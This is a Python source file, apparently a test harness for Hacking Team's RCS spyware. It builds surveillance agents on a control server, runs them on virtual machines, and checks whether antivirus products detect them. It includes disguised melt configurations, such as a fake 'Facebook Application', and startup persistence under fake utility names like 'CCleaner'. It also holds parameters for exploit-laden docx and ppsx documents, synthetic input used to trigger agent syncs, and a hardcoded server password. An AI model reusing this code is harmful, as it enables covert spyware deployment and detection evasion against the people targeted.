import os import shutil from time import sleep import time import socket import urllib2 import zipfile import os.path import re import traceback import subprocess import Queue import threading import argparse import itertools import random from ConfigParser import ConfigParser from urllib2 import HTTPError import ctypes import shutil from rcs_client import Rcs_client from AVCommon.logger import logging from AVCommon import process from AVCommon import helper MOUSEEVENTF_MOVE = 0x0001 # mouse move MOUSEEVENTF_ABSOLUTE = 0x8000 # absolute move MOUSEEVENTF_MOVEABS = MOUSEEVENTF_MOVE + MOUSEEVENTF_ABSOLUTE MOUSEEVENTF_LEFTDOWN = 0x0002 # left button down MOUSEEVENTF_LEFTUP = 0x0004 # left button up MOUSEEVENTF_CLICK = MOUSEEVENTF_LEFTDOWN + MOUSEEVENTF_LEFTUP #names = ['BTHSAmpPalService','CyCpIo','CyHidWin','iSCTsysTray','quickset','agent'] #names = ['btplayerctrl', 'HydraDM', 'iFrmewrk', 'Toaster', 'rusb3mon', 'SynTPEnh', 'agent'] names = ['8169Diag', 'CCleaner', 'Linkman', 'PCSwift', 'PerfTune', 'SystemOptimizer', 'agent'] start_dirs = ['C:/Users/avtest/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup', 'C:/Documents and Settings/avtest/Start Menu/Programs/Startup', 'C:/Users/avtest/Desktop'] def unzip(filename, fdir): zfile = zipfile.ZipFile(filename) names = [] for name in zfile.namelist(): (dirname, filename) = os.path.split(name) logging.debug("- Decompress: %s / %s" % (fdir, filename)) zfile.extract(name, fdir) names.append('%s/%s' % (fdir, name)) return names def check_static(files, report = None): global report_send if report: report_send = report rcs_words = ['rcs', 'hackingteam', 'hacking', 'zeno', 'guido', 'chiodo', 'naga', 'alor'] success = [] failed = [] for src in files: logging.debug("DBG: check_static: %s" % src) dst = "%s.copy.exe" % src if os.path.exists(src): logging.debug("Copying %s to %s" % (src, dst)) try: shutil.copy(src, dst) except Exception, ex: logging.exception("Exception file: %s" % src) time.sleep(15) for src in files: dst = "%s.copy.exe" % src if not os.path.exists(src): failed.append(src) logging.error("Not existent file: %s" % src) else: if os.path.exists(dst) and os.path.exists(src): success.append(src) logging.debug("succesful copy %s to %s" % (src, dst)) else: logging.error("cannot copy") failed.append(src) allowed = { 'rcs': ['AVAgent/assets/check/mac_core', 'AVAgent/assets/check/mac_osax'] } for src in files: if not os.path.exists(src): continue f = open(src) all = f.read() for key in rcs_words: allow_list = allowed.get(key,[]) if key in allow_list: continue if key in all or key.lower() in all or key.upper() in all: #failed.append("Key: %s in %s" % (key, src)) add_result("+ WARNING: %s in %s" % (key, src)) if not failed: add_result("+ SUCCESS CHECK_STATIC: %s" % success) else: add_result("+ FAILED CHECK_STATIC. SIGNATURE DETECTION: %s" % failed) return failed def internet_on(): ips = ['173.194.35.176', '8.8.8.8', '8.8.4.4', '198.41.209.140', '204.79.197.200'] q = Queue.Queue() for i in ips: t = threading.Thread(target=check_internet, args=(i, q)) t.daemon = True t.start() s = [q.get() for i in ips] return any(s) def check_internet(address, queue): """ True if dns or http are reachable """ logging.debug("- Check connection: %s" % address) ret = False try: if (ret is False): response = urllib2.urlopen('http://' + address, timeout=5) # logging.debug("i reach url: ", address) ret |= True except: ret |= False queue.put(ret) class connection: host = "" user = "avmonitor" passwd = "testriteP123" # old: avmonitorp123 operation = 'AVMonitor' rcs=[] def __enter__(self): logging.debug("DBG login %s@%s" % (self.user, self.host)) assert connection.host self.conn = Rcs_client(connection.host, connection.user, connection.passwd) self.conn.login() return self.conn def __exit__(self, type, value, traceback): logging.debug("DBG logout") self.conn.logout() def get_target_name(): return 'VM_%s' % helper.get_hostname() class AgentBuild: def __init__(self, backend, frontend=None, platform='windows', kind='silent', ftype='desktop', blacklist=[], soldierlist=[], param=None, puppet="puppet", asset_dir="AVAgent/assets", factory=None): self.kind = kind self.host = (backend, frontend) self.hostname = helper.get_hostname() self.prefix = puppet self.blacklist = blacklist self.soldierlist = soldierlist self.platform = platform self.asset_dir = asset_dir self.ftype = ftype self.param = param self.factory = factory logging.debug("DBG blacklist: %s" % self.blacklist) logging.debug("DBG soldierlist: %s" % self.soldierlist) logging.debug("DBG hostname: %s" % self.hostname) def _delete_targets(self, operation): numtarget = 0 with connection() as c: operation_id, group_id = c.operation(operation) logging.debug("operation_id: %s" % operation_id) targets = c.targets(operation_id) for t_id in targets: logging.debug("- Delete target: %s" % t_id) c.target_delete(t_id) numtarget += 1 return numtarget def _disable_analysis(self): with connection() as c: c.disable_analysis() return True def _create_new_factory(self, operation, target, factory, config): with connection() as c: assert c if not c.logged_in(): logging.warn("Not logged in") logging.debug( "DBG type: " + self.ftype + ", operation: " + operation + ", target: " + target + ", factory: " + factory) operation_id, group_id = c.operation(operation) if not operation_id: raise RuntimeError("Cannot get operations") # gets all the target with our name in an operation targets = c.targets(operation_id, target) if len(targets) > 0: # keep only one target for t in targets[1:]: c.target_delete(t) target_id = targets[0] agents = c.agents(target_id) for agent_id, ident, name in agents: logging.debug("DBG %s %s %s" % (agent_id, ident, name)) if name.startswith(factory): logging.debug("- Delete instance: %s %s" % (ident, name)) c.instance_delete(agent_id) else: logging.debug("- Create target: %s" % target) target_id = c.target_create( operation_id, target, 'made by vmavtest at %s' % time.ctime()) factory_id, ident = c.factory_create( operation_id, target_id, self.ftype, factory, 'made by vmavtestat at %s' % time.ctime() ) with open(config) as f: conf = f.read() conf = re.sub( r'"host": ".*"', r'"host": "%s"' % self.host[1], conf) #logging.debug("conf: %s" % conf) c.factory_add_config(factory_id, conf) with open('build/config.actual.json', 'wb') as f: f.write(conf) return (target_id, factory_id, ident) def _build_agent(self, factory, melt=None, kind="silent",tries=0): with connection() as c: try: # TODO: togliere da qui, metterla in procedures filename = 'build/%s/build.zip' % self.platform if os.path.exists(filename): os.remove(filename) if kind=="melt" and melt: logging.debug("- Melt build with: %s" % melt) appname = "exp_%s" % self.hostname self.param['melt']['appname'] = appname self.param['melt']['url'] = "http://%s/%s/" % (c.host, appname) if 'deliver' in self.param: self.param['deliver']['user'] = c.myid r = c.build_melt(factory, self.param, melt, filename) else: logging.debug("- Silent build") r = c.build(factory, self.param, filename) contentnames = unzip(filename, "build/%s" % self.platform) # CHECK FOR DELETED FILES failed = check_static(contentnames) if not failed: add_result("+ SUCCESS SCOUT BUILD") return contentnames else: add_result("+ FAILED SCOUT BUILD. SIGNATURE DETECTION: %s" % failed) raise RuntimeError("Signature detection") except HTTPError as err: logging.debug("DBG trace %s" % traceback.format_exc()) if tries <= 3: tries += 1 logging.debug("DBG problem building scout. tries number %s" % tries) return self._build_agent(factory, melt, kind, tries) else: add_result("+ ERROR SCOUT BUILD AFTER %s BUILDS" % tries) raise err except Exception, e: logging.debug("DBG trace %s" % traceback.format_exc()) add_result("+ ERROR SCOUT BUILD EXCEPTION RETRIEVED") raise e def _execute_build(self, exe, silent=False): try: if isinstance(exe, list): exe = exe[0] logging.debug("- Execute: " + exe) #subp = subprocess.Popen([exe]) #, shell=True) exefile = exe.replace("/","\\") subp = subprocess.Popen(exefile, shell=True) if not silent: add_result("+ SUCCESS SCOUT EXECUTE") except Exception, e: logging.debug("DBG trace %s" % traceback.format_exc()) add_result("+ FAILED SCOUT EXECUTE") raise e def _click_mouse(self, x, y): # move first x = 65536L * x / ctypes.windll.user32.GetSystemMetrics(0) + 1 y = 65536L * y / ctypes.windll.user32.GetSystemMetrics(1) + 1 ctypes.windll.user32.mouse_event(MOUSEEVENTF_MOVEABS, x, y, 0, 0) # then click ctypes.windll.user32.mouse_event(MOUSEEVENTF_CLICK, 0, 0, 0, 0) def _trigger_sync(self, timeout=10): subp = subprocess.Popen(['AVAgent/assets/keyinject.exe']) process.wait_timeout(subp, timeout) try: p = subprocess.Popen(['AVAgent/assets/getusertime.exe'], stdout=subprocess.PIPE) out, err = p.communicate() logging.debug("get usertime: %s" % out) except: logging.exception("cannot get usertime") def get_can_upgrade(self, instance): with connection() as c: level = str(c.instance_can_upgrade(instance)) logging.debug("get_can_upgrade level: %s" % (level)) return level def check_level(self, instance, expected): with connection() as c: level = str(c.instance_level(instance)) logging.debug("level, expected: %s got: %s" % (expected, level)) if not level == expected: add_result("+ FAILED %s LEVEL %s" % (expected.upper(), level.upper())) return False else: add_result("+ SUCCESS %s LEVEL" % level.upper()) return True def check_instance(self, ident): with connection() as c: instances = c.instances(ident) logging.debug("DBG instances: %s" % instances) logging.debug("DBG rcs: %s" % str(connection.rcs)) assert len(instances) <= 1, "too many instances" if len(instances) == 1: add_result("+ SUCCESS SCOUT SYNC") c.instance = instances[0] return instances[0] elif len(instances) > 1: add_result("+ FAILED SCOUT SYNC, TOO MANY INSTANCES") c.instance = instances[0] return instances[0] add_result("+ NO SCOUT SYNC") # self._ return None @DeprecationWarning def _check_elite(self, instance_id): with connection() as c: info = c.instance_info(instance_id) logging.debug('DBG _check_elite %s' % info) ret = info['upgradable'] is False and info['scout'] is False if ret: add_result("+ SUCCESS ELITE SYNC") else: add_result("+ NOT YET ELITE SYNC") return ret def _check_upgraded(self, instance_id): with connection() as c: info = c.instance_info(instance_id) logging.debug('DBG _check_elite: %s' % info['level']) ret = info['upgradable'] is False if ret: add_result("+ SUCCESS UPGRADED SYNC") else: add_result("+ NOT YET UPGRADED SYNC: %s" % info['level']) return ret, info['level'] def uninstall(self, instance_id): with connection() as c: c.instance_close(instance_id) def _upgrade(self, instance_id, force_soldier = False): with connection() as c: ret = c.instance_upgrade(instance_id, force_soldier) logging.debug("DBG _upgrade: %s" % ret) info = c.instance_info(instance_id) logging.debug("DBG info['level']: %s" % info['level']) return ret def _list_processes(self): return subprocess.Popen(["tasklist"], stdout=subprocess.PIPE).communicate()[0] def server_errors(self): with connection() as c: return c.server_status()['error'] def create_user_machine(self): logging.debug("create_user_machine") privs = [ 'ADMIN', 'ADMIN_USERS', 'ADMIN_OPERATIONS', 'ADMIN_TARGETS', 'ADMIN_AUDIT', 'ADMIN_LICENSE', 'SYS', 'SYS_FRONTEND', 'SYS_BACKEND', 'SYS_BACKUP', 'SYS_INJECTORS', 'SYS_CONNECTORS', 'TECH', 'TECH_FACTORIES', 'TECH_BUILD', 'TECH_CONFIG', 'TECH_EXEC', 'TECH_UPLOAD', 'TECH_IMPORT', 'TECH_NI_RULES', 'VIEW', 'VIEW_ALERTS', 'VIEW_FILESYSTEM', 'VIEW_EDIT', 'VIEW_DELETE', 'VIEW_EXPORT', 'VIEW_PROFILES'] user_name = "avmonitor_%s_%s" % (self.prefix, self.hostname) connection.user = user_name user_exists = False try: with connection() as c: logging.debug("LOGIN SUCCESS") user_exists = True except: pass if not user_exists: connection.user = "avmonitor" with connection() as c: ret = c.operation(connection.operation) op_id, group_id = ret c.user_create(user_name, connection.passwd, privs, group_id) connection.user = user_name return True def execute_elite(self): """ build scout and upgrade it to elite """ instance_id = self.execute_scout() self.execute_elite_fast(instance_id, False) def execute_soldier(self, instance_id = None, fast = True): instance_id = self.execute_scout() self.execute_soldier_fast(instance_id, False) def execute_soldier_fast(self, instance_id = None, fast = True): if not instance_id: with connection() as c: instance_id, target_id = get_instance(c) if not instance_id: logging.debug("- exiting execute_soldier because did't sync") return level = self.get_can_upgrade(instance_id) if level not in ["elite", "soldier"]: if self.hostname in self.blacklist: add_result("+ SUCCESS BLACKLIST: %s" % level) else: add_result("+ FAILED CANUPGRADE: %s" % level) return #TODO rimettere logging.debug("- Try upgrade to soldier") upgradable = self._upgrade(instance_id, force_soldier=True) if not upgradable: if self.hostname in self.blacklist: add_result("+ FAILED UPGRADE BLACKLISTED") else: add_result("+ FAILED CANUPGRADE: %s" % level) return else: logging.debug("upgraded correctly") return self.check_upgraded(instance_id, "soldier", fast) def execute_elite_fast(self, instance_id = None, fast = True): if not instance_id: with connection() as c: instance_id, target_id = get_instance(c) if not instance_id: add_result("+ FAILED DID NOT SYNC") logging.debug("- exiting execute_elite_fast because did't sync") return level = self.get_can_upgrade(instance_id) if level in ["elite", "soldier"]: if self.hostname in self.blacklist: add_result("+ FAILED ALLOW BLACKLISTED") return else: #error if self.hostname in self.blacklist: add_result("+ SUCCESS UPGRADE BLACKLISTED") else: if level == "Error409": add_result("+ FAILED CANUPGRADE, NO DEVICE") else: add_result("+ FAILED CANUPGRADE: %s" % level) return logging.debug("- Try upgrade to %s" % level) upgradable = self._upgrade(instance_id) if not upgradable: add_result("+ FAILED UPGRADE") return logging.debug("DBG %s in %s and %s" % (self.hostname, self.blacklist, self.soldierlist)) if level == "soldier": if self.hostname in self.soldierlist: add_result("+ SUCCESS SOLDIER BLACKLISTED") else: add_result("+ FAILED ELITE UPGRADE") return else: if self.hostname in self.soldierlist: add_result("+ FAILED SOLDIER BLACKLISTED") return return self.check_upgraded(instance_id, level, fast) def check_upgraded(self, instance_id, level, fast = True): logging.debug("check_upgraded") if fast: logging.debug("- Upgrade, Wait for 5 minutes: %s" % time.ctime()) sleep(5 * 60) # key press for tries in range(1, 10): logging.debug("- Upgrade, Trigger sync for 30 seconds, try %s" % tries) self._trigger_sync(timeout=30) logging.debug("- Upgrade, wait for 1 minute: %s" % time.ctime()) sleep(60 * 1) upgraded, got_level = self._check_upgraded(instance_id) if upgraded: break for i in range(10): self._click_mouse(100 + i, 0) else: logging.debug("- %s, Wait for 25 minutes: %s" % (level, time.ctime())) sleep(25 * 60) upgraded = self.check_level(instance_id, level) logging.debug("Upgraded: %s" % upgraded) if upgraded: #if got_level != level: # add_result("+ FAILED LEVEL: %s" % level) sleep(60) #add_result("+ SUCCESS UPGRADE INSTALL %s" % got_level.upper()) if level == "soldier": executed = self.execute_agent_startup(); if not executed: add_result("+ FAILED EXECUTE %s" % level.upper()) upgraded = False else: for tries in range(1, 10): sleep(30) self._trigger_sync(timeout=30) for i in range(10): self._click_mouse(100 + i, 0) upgraded = self.check_level(instance_id, "soldier") if upgraded: break if not upgraded: add_result("+ FAILED UPGRADE %s" % level.upper()) else: upgraded = self.check_level(instance_id, "elite") logging.debug("re executing scout") self._execute_build(["build/scout.exe"], silent=True) sleep(5 * 60) logging.debug("- %s, uninstall: %s" % (level, time.ctime())) #sleep(60) self.uninstall(instance_id) sleep(60) if upgraded: add_result("+ SUCCESS %s UNINSTALLED" % level.upper()) else: output = self._list_processes() logging.debug(output) add_result("+ FAILED %s INSTALL" % level.upper()) logging.debug("- Result: %s" % upgraded) logging.debug("- sending Results to Master") def execute_agent_startup(self): logging.debug("execute_agent_startup") executed = False for d, b in itertools.product(start_dirs, names): filename = "%s/%s.exe" % (d, b) filename = filename.replace("/", "\\") logging.debug("check if exists: %s" % filename) if os.path.exists(filename): try: logging.debug("try to execute %s: " % filename) subprocess.Popen([filename]) executed = True break except: logging.exception("Cannot execute %s" % filename) if not executed: for dir in start_dirs: dir = dir.replace("/", "\\") if os.path.exists(dir): logging.debug("dir %s: %s" % (dir, os.listdir(dir))) return executed def execute_scout(self): """ build and execute the """ factory_id, ident, exe = self.execute_pull() new_exe = "build\\scout.exe" logging.debug("execute_scout: %s" % exe) shutil.copy(exe[0], new_exe) self._execute_build(exe) if self.kind == "melt": # and not exploit sleep(60) executed = self.execute_agent_startup() if not executed: logging.warn("did'n executed") add_result("+ WARN did not drop startup") logging.debug("- Scout, Wait for 5 minutes: %s" % time.ctime()) sleep(300) for tries in range(1, 10): logging.debug("- Scout, Trigger sync for 30 seconds, try %s" % tries) self._trigger_sync(timeout=30) logging.debug("- Scout, wait for 1 minute: %s" % time.ctime()) sleep(60 * 1) instance_id = self.check_instance(ident) if instance_id: break for i in range(10): self._click_mouse(100 + i, 0) if not instance_id: add_result("+ FAILED SCOUT SYNC") output = self._list_processes() logging.debug(output) else: self.check_level(instance_id, "scout") if self.kind == "melt": try: found = False for d,b in itertools.product(start_dirs,names): filename = "%s/%s.exe" % (d,b) filename = filename.replace("/","\\") if os.path.exists(filename): found = True if not found: logging.warn("did'n executed") add_result("+ FAILED NO STARTUP") except: pass logging.debug("- Result: %s" % instance_id) return instance_id def execute_pull(self): """ build and execute the """ logging.debug("- Host: %s %s\n" % (self.hostname, time.ctime())) operation = connection.operation target = get_target_name() if not self.factory: # desktop_exploit_melt, desktop_scout_ factory = '%s_%s_%s_%s' % ( self.hostname, self.ftype, self.platform, self.kind) else: factory = self.factory config = "%s/config_%s.json" % (self.asset_dir, self.ftype) if not os.path.exists('build'): os.mkdir('build') if not os.path.exists('build/%s' % self.platform): os.mkdir('build/%s' % self.platform) target_id, factory_id, ident = self._create_new_factory( operation, target, factory, config) connection.rcs=(target_id, factory_id, ident, operation, target, factory) logging.debug("- Built, rcs: %s" % str(connection.rcs)) meltfile = self.param.get('meltfile', None) exe = self._build_agent(factory_id, melt=meltfile, kind=self.kind) """ if "exploit_" in self.platform: appname = "exp_%s.exe" % self.platform #if self.platform == 'exploit_docx': # appname = "exp_%s/avtest.swf" % self.hostname #elif self.platform == 'exploit_ppsx': # appname = "pexp_%s/avtest.swf" % self.hostname #elif self.platform == 'exploit_web': # dllname = "exp_%s/PMIEFuck-WinWord.dll" % self.hostname # docname = "exp_%s/owned.docm" % self.hostname #url = "http://%s/%s" % (self.host[1], appname) #logging.debug("DBG getting: %s" % url) #done = False #try: # u = urllib2.urlopen(url) localFile = open('build/file.swf', 'w') localFile.write(u.read()) localFile.close() sleep(2) with open('build/file.swf'): done = True if "exploit_web" in self.platform: url = "http://%s/%s" % (self.host[1], docname) u = urllib2.urlopen(url) docFile = open('build/owned.docm', 'w') docFile.write(u.read()) docFile.close() sleep(2) with open('build/owned.docm'): done = True url = "http://%s/%s" % (self.host[1], dllname) u = urllib2.urlopen(url) docFile = open('build/PMIEFuck-WinWord.dll', 'w') docFile.write(u.read()) docFile.close() sleep(2) with open('build/PMIEFuck-WinWord.dll'): done = True if done == True: add_result("+ SUCCESS EXPLOIT SAVE") except urllib2.HTTPError: add_result("+ ERROR EXPLOIT DOWNLOAD") pass except IOError: add_result("+ FAILED EXPLOIT SAVE") pass """ return factory_id, ident, exe def execute_web_expl(self, websrv): """ WEBZ: we need to download some files only """ def check_file(filename): try: with open(filename): logging.debug("DBG %s saved" % filename) return True except IOError: logging.debug("DBG failed saving %s" % appname) return False appname = "" done = True filez = ["AVAgent/assets/windows/avtest.swf", "AVAgent/assets/windows/owned.docm", "AVAgent/assets/windows/PMIEFuck-WinWord.dll"] for appname in filez: if check_file(appname) is False: done = False break if done is True: add_result("+ SUCCESS EXPLOIT SAVE") else: add_result("+ FAILED EXPLOIT SAVE") results = [] report_send = None def add_result(result): global results, report_send logging.debug(result) results.append(result) if report_send: logging.debug("report_send") report_send(result) internet_checked = False # args: platform_type, backend, frontend, kind, blacklist def execute_agent(args, level, platform): """ starts the vm and execute elite,scout or pull, depending on the level """ global internet_checked ftype = args.platform_type logging.debug("DBG ftype: %s" % ftype) vmavtest = AgentBuild(args.backend, args.frontend, platform, args.kind, ftype, args.blacklist, args.soldierlist, args.param, args.puppet, args.asset_dir, args.factory) """ starts a scout """ if socket.gethostname().lower() not in args.nointernetcheck: if not internet_checked and internet_on(): add_result("+ ERROR: I reach Internet") return False internet_checked = True logging.debug("- Network unreachable") logging.debug("- Server: %s/%s %s" % (args.backend, args.frontend, args.kind)) if platform == "exploit_web": vmavtest.execute_web_expl(args.frontend) else: if vmavtest.create_user_machine(): #add_result("+ SUCCESS USER CONNECT") if vmavtest.server_errors(): #add_result("+ WARN SERVER ERRORS") logging.warn("Server errors") #add_result("+ SUCCESS SERVER CONNECT") action = {"elite": vmavtest.execute_elite, "scout": vmavtest.execute_scout, "pull": vmavtest.execute_pull, "elite_fast": vmavtest.execute_elite_fast, "soldier_fast": vmavtest.execute_soldier_fast, "soldier": vmavtest.execute_soldier } sleep(5) action[level]() else: add_result("+ ERROR USER CREATE") return True def get_instance(client, imei=None): print 'passed imei to get_isntance ', imei #logging.debug("client: %s" % client) operation_id, group_id = client.operation(connection.operation) target = get_target_name() targets = client.targets(operation_id, target) if len(targets) != 1: return False, "not one target: %s" % len(targets) target_id = targets[0] instances = client.instances_by_target_id(target_id) instances = [k for k in instances if k['status'] == 'open'] logging.debug("found these instances: %s" % instances) if len(instances) == 0: return False, "no open instances" if not imei: print "not imei" if len(instances) > 1: #return False, "not one instance: %s" % len(instances) logging.debug("WARNING: more than one instances: %s, choosing last one" % len(instances)) try: instances=sorted(instances, key=lambda x: x['stat']['last_sync']) except: logging.excpetion("sorting") instance = instances[-1] else: #print "instance 0: ", instances[0] try: instance = [ inst for inst in instances if inst["stat"]['device'] == imei][0] except: return None, None instance_id = instance['_id'] target_id = instance['path'][1] return instance_id, target_id def check_evidences(backend, type_ev, key=None, value=None): connection.host = backend logging.debug("type_ev: %s, filter: %s=%s" % (type_ev, key, value)) number = 0 with connection() as client: logging.debug("connected") instance_id, target_id = get_instance(client) print "on build instance_id: ", instance_id if not instance_id: return False, target_id evidences = client.evidences(target_id, instance_id, "type", type_ev) if key: for ev in evidences: #content = ev['data']['content'] logging.debug("got evidence: %s" % ev) v = ev['data'][key] if v == value: number+=1 logging.debug( "evidence %s: %s -> %s" %(type_ev, key, value)) else: number = len(evidences) return number > 0, number def check_blacklist(blacklist=None): with connection() as client: logging.debug("connected") blacklist_server = client.blacklist() logging.info("blacklist from server: %s" % blacklist_server) if blacklist: logging.info("blacklist from conf: %s" % blacklist) report_send("+ BLACKLIST: %s" % blacklist_server) def uninstall(backend): logging.debug("- Clean Server: %s" % (backend)) connection.host = backend target = get_target_name() logging.debug("target: %s" % (target)) with connection() as client: logging.debug("connected") operation_id, group_id = client.operation(connection.operation) targets = client.targets(operation_id, target) if len(targets) != 1: return False, "not one target: %s" % len(targets) target_id = targets[0] instances = client.instances_by_target_id(target_id) #logging.debug("found these instances: %s" % instances) if len(instances) != 1: logging.warn("more than one instance") for instance in instances: instance_id = instance['_id'] target_id = instance['path'][1] #logging.debug('closing instance: %s' % instance) client.instance_close(instance_id) return True, "Instance closed" def clean(backend): logging.debug("- Clean Server: %s" % (backend)) connection.host = backend vmavtest = AgentBuild(backend) return vmavtest._delete_targets(connection.operation) def disable_analysis(backend): logging.debug("- Disable Analysis: %s" % (backend)) connection.host = backend vmavtest = AgentBuild(backend) return vmavtest._disable_analysis() def build(args, report): global results, report_send results = [] report_send = report connection.host = args.backend connection.operation = args.operation action = args.action platform = args.platform kind = args.kind if report_send: report_send("+ INIT %s, %s, %s" % (action, platform, kind)) try: #check_blacklist(blacklist) if action in ["pull", "scout", "elite", "elite_fast", "soldier", "soldier_fast"]: execute_agent(args, action, args.platform) elif action == "clean": clean(args.backend) else: add_result("+ ERROR, Unknown action %s, %s, %s" % (action, platform, kind)) except Exception as ex: logging.exception("executing agent: %s" % action) add_result("+ ERROR: %s" % str(ex)) errors = [ b for b in results if b.startswith("+ ERROR") or b.startswith("+ FAILED")] success = not any(errors) if report_send: report_send("+ END %s %s" % (action, success)) return results, success, errors def main(): parser = argparse.ArgumentParser(description='AVMonitor avtest.') #'elite' parser.add_argument( 'action', choices=['scout', 'elite', 'internet', 'test', 'clean', 'pull']) parser.add_argument('-p', '--platform', default='windows') parser.add_argument('-b', '--backend') parser.add_argument('-f', '--frontend') parser.add_argument('-k', '--kind', choices=['silent', 'melt']) parser.add_argument('-v', '--verbose', action='store_true', default=False, help="Verbose") #parser.set_defaults(blacklist=blacklist) #parser.set_defaults(platform_type=platform_type) args = parser.parse_args() #edit by ML winhostname = socket.gethostname().lower() if "winxp" in winhostname: avname = winhostname.replace("winxp", "").lower() elif "win7" in winhostname: avname = winhostname.replace("win7", "").lower() else: avname = winhostname.replace("win8", "").lower() platform_mobile = ["android", "blackberry", "ios"] soldierlist = "bitdef,comodo,gdata,drweb,360cn,kis32,avg,avg32,iobit32".split(',') blacklist = "emsisoft,sophos".split(',') demo = False params = {} params['blackberry'] = { 'platform': 'blackberry', 'binary': {'demo': demo}, 'melt': {'appname': 'facebook', 'name': 'Facebook Application', 'desc': 'Applicazione utilissima di social network', 'vendor': 'face inc', 'version': '1.2.3'}, 'package': {'type': 'local'}} params['windows'] = { 'platform': 'windows', 'binary': {'demo': demo, 'admin': False}, 'melt': {'scout': True, 'admin': False, 'bit64': True, 'codec': True}, 'sign': {} } params['android'] = { 'platform': 'android', 'binary': {'demo': demo, 'admin': False}, 'sign': {}, 'melt': {} } params['linux'] = { 'platform': 'linux', 'binary': {'demo': demo, 'admin': False}, 'melt': {} } params['osx'] = {'platform': 'osx', 'binary': {'demo': demo, 'admin': True}, 'melt': {} } params['ios'] = {'platform': 'ios', 'binary': {'demo': demo}, 'melt': {} } params['exploit'] = {"generate": {"platforms": ["windows"], "binary": {"demo": False, "admin": False}, "exploit": "HT-2012-001", "melt": {"demo": False, "scout": True, "admin": False}}, "platform": "exploit", "deliver": {"user": "USERID"}, "melt": {"combo": "txt", "filename": "example.txt", "appname": "agent.exe", "input": "000"}, "factory": {"_id": "000"} } params['exploit_docx'] = {"generate": {"platforms": ["windows"], "binary": {"demo": False, "admin": False}, "exploit": "HT-2013-002", "melt": {"demo": False, "scout": True, "admin": False}}, "platform": "exploit", "deliver": {"user": "USERID"}, "melt": {"filename": "example.docx", "appname": "APPNAME", "input": "000", "url": "http://HOSTNAME/APPNAME"}, "factory": {"_id": "000"} } params['exploit_ppsx'] = {"generate": {"platforms": ["windows"], "binary": {"demo": False, "admin": False}, "exploit": "HT-2013-003", "melt": {"demo": False, "scout": True, "admin": False}}, "platform": "exploit", "deliver": {"user": "USERID"}, "melt": {"filename": "example.ppsx", "appname": "APPNAME", "input": "000", "url": "http://HOSTNAME/APPNAME"}, "factory": {"_id": "000"} } params['exploit_web'] = {"generate": {"platforms": ["windows"], "binary": {"demo": False, "admin": False}, "exploit": "HT-2013-002", "melt": {"demo": False, "scout": True, "admin": False}}, "platform": "exploit", "deliver": {"user": "USERID"}, "melt": {"filename": "example.docx", "appname": "APPNAME", "input": "000", "url": "http://HOSTNAME/APPNAME"}, "factory": {"_id": "000"} } p_t = "desktop" if args.platform in platform_mobile: p_t = "mobile" build(args.action, args.platform, p_t, args.kind, params[args.platform], args.backend, args.frontend, blacklist, soldierlist, None) if __name__ == "__main__": main() .